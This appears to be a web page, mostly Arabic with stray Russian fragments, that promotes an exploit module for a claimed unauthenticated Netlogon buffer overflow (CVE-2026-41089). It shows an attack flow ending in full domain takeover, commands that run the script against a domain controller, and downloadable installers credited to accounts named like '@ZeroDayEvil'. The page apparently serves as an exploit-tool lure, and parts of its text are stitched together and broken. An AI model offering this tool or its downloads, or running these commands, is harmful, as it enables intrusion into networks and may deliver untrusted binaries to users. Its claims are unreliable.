
🛡️ وحدة تشخيص رسمية لأداة الأمن بالذكاء الاصطناعي للثغرة CVE-2026-41089 (تجاوز سعة المخزن المؤقت في مكدس Windows Netlogon والتنفيذ عن بُعد). تتضمن تحليلاً تقنياً، ومعمارية الهجوم، ومؤشرات الاختراق، واستراتيجية التخفيف.
🛡️ AI Security Tool Module
CVE-2026-41089: Netlogon Stack Buffer Overflow
الوحدة الرسمية لفحص الأمان لمنظومة AI Security Tool
🌐 النسخة التجريبية • 📚 موقع المشروع • 💬 دردشة المجتمع
التنقل في الموقع: الرئيسية • التحديثات • التنزيلات • الوحدات
أنشر تحليلاً تقنياً مفصلاً لثغرة أمنية حرجة CVE-2026-41089 تم اكتشافها في خدمة Windows Netlogon. يُظهر تحليلي أن المشكلة مرتبطة بفيض المخزن المؤقت في المكدس (CWE-121). من خلال إرسال طلبات مُصممة خصيصاً إلى وحدة التحكم بالمجال (DC)، يمكن لمهاجم غير مُصادق عليه التسبب في تلف الذاكرة وتنفيذ تعليمات برمجية عشوائية على مستوى NT AUTHORITY\SYSTEM.
"من يتحكم في Netlogon، يتحكم في المملكة."
نظراً لأن استغلال الثغرة لا يتطلب مصادقة أو تفاعل المستخدم، فإن هذه المشكلة تمثل تهديداً حرجاً للبنى التحتية للمؤسسات، مما يفتح طريقاً مباشراً لاختراق Active Directory.
graph TD
A[Unauthenticated Attacker] -->|Network Access| B[Locate Domain Controller]
B -->|Send Crafted Netlogon Packet| C[Trigger Stack Buffer Overflow]
C -->|Memory Corruption in LSASS| D[Arbitrary Code Execution]
D --> E[Full Domain Controller Takeover]
E --> F[Complete Active Directory Compromise]NTDS.dit.🔍 مؤشرات الاختراق:
lsass.exe).lsass.exe.📈 مصادر السجلات الموصى بها: Windows Security Events (Event IDs сбоев служб), Sysmon (Process Creation), Microsoft Defender for Identity.
lsass.exe.⚠️ هام: تم تطوير هذه الوحدة حصرياً للتشخيص الآمن ضمن منصة AI Security Tool. نوصي بشدة باستخدام الوحدات المعتمدة فقط من المستودع الرسمي.
يتطلب تشغيل الوحدة وجود نواة البرنامج مثبتة:
تعليمات البناء من الكود المصدري متاحة في المستودع الرسمي لـ AI Security Tool.
# Тест подключения и базовая проверка (короткое имя пользователя) python3 CVE-2026-41089.py 10.0.50.21 corp.localПроверка уязвимости к переполнению буфера (длина 130)
python3 CVE-2026-41089.py 10.0.50.21 corp.local -l 130
Безопасная проверка с повышенным таймаутом для медленных сетей
python3 CVE-2026-41089.py 10.0.50.21 corp.local -l 200 -t 10
مجموعة من الثغرات الأمنية ونصوص PoC والأبحاث، يدعمها أعضاء مجتمعنا:
4 модуля@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
2 модуля@ZeroDayVPN
@ZeroDayEvil
2 модуля@ZeroDayEvil
@ZeroDayVPN
تُقدَّم هذه الوحدة والمواد حصرياً لتدقيق الأمان المُصرَّح به والأغراض البحثية.
يُعد استخدام هذه الوحدة على أنظمة دون موافقة كتابية مسبقة من المالك أمراً غير قانوني. لا يتحمل المؤلف ومطورو AI Security Tool أي مسؤولية عن الأضرار المحتملة الناتجة عن الاستخدام غير الصحيح للمواد.
نرحب بأي مساهمة في تطوير المشروع! المجالات الرئيسية:
AI Security Tool — Reimagining terminal workflow and automation for cybersecurity professionals.
| المعامل | القيمة | ملاحظة |
|---|
| CVE ID | CVE-2026-41089 | المعرّف الرسمي للثغرة الأمنية |
| مستوى الخطورة | Critical (CVSS v3.1: 9.8) | ████████████████████ 100% |
| نوع الثغرة الأمنية | CWE-121 | Stack-based Buffer Overflow |
| المكوّن المصاب | Windows Netlogon Service | خدمة مصادقة Active Directory |
| ناقل الهجوم | Network (شبكي) | تنفيذ عن بُعد دون الوصول إلى المضيف |
| الصلاحيات المطلوبة | None (غير مطلوبة) | Unauthenticated RCE |
| نظام التشغيل / المنصة | الإصدار | البنية / الصيغة | تاريخ التحديث | الحالة | التنزيل |
|---|
| 🪟 Windows | v6.3.20 | x64 Installer (.exe) | 2026-09-08 | 🟢 Latest | تنزيل .exe |
| 🪟 Windows | v6.3.20 | x64 Portable (.tar.gz) | 2026-09-08 | 🟢 Latest | تنزيل .tar.gz |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 Stable | تنزيل .dmg |
| 🐧 Linux | v5.3.27 | Universal x64 (.tar.gz) | 2026-09-01 | 🟢 Stable | تنزيل .tar.gz |
| 🤖 Android | v8a 5.3.27 | ARM64 APK (.apk) | 2026-09-01 | 🟢 Stable | تنزيل .apk |